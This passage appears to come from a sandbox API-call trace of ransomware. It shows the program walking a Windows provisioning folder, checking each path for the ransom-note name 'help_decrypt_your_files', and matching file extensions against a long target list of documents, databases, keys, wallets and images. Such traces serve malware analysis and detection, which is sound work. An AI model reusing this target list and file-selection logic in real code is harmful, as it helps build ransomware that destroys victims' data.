f1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0173.087] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19da08f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0173.087] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0173.087] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0173.087] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\"
	[0173.095] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml"
	[0173.095] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0173.095] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.095] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0173.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.096] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.096] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml"
	[0173.096] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml") returned 109
	[0173.096] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.096] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0173.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.097] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0173.097] FindNextFileW (in: hFindFile=0xfb9330, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1
	[0173.097] lstrcmpW (lpString1="Power_2.provxml", lpString2="..") returned 1
	[0173.097] lstrcmpW (lpString1="Power_2.provxml", lpString2=".") returned 1
	[0173.097] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\"
	[0173.097] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\", lpString2="Power_2.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml"
	[0173.098] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml") returned 109
	[0173.098] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.098] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml") returned 0x6d
	[0173.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.098] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.098] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml"
	[0173.098] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml") returned 109
	[0173.098] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.099] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0173.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.099] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4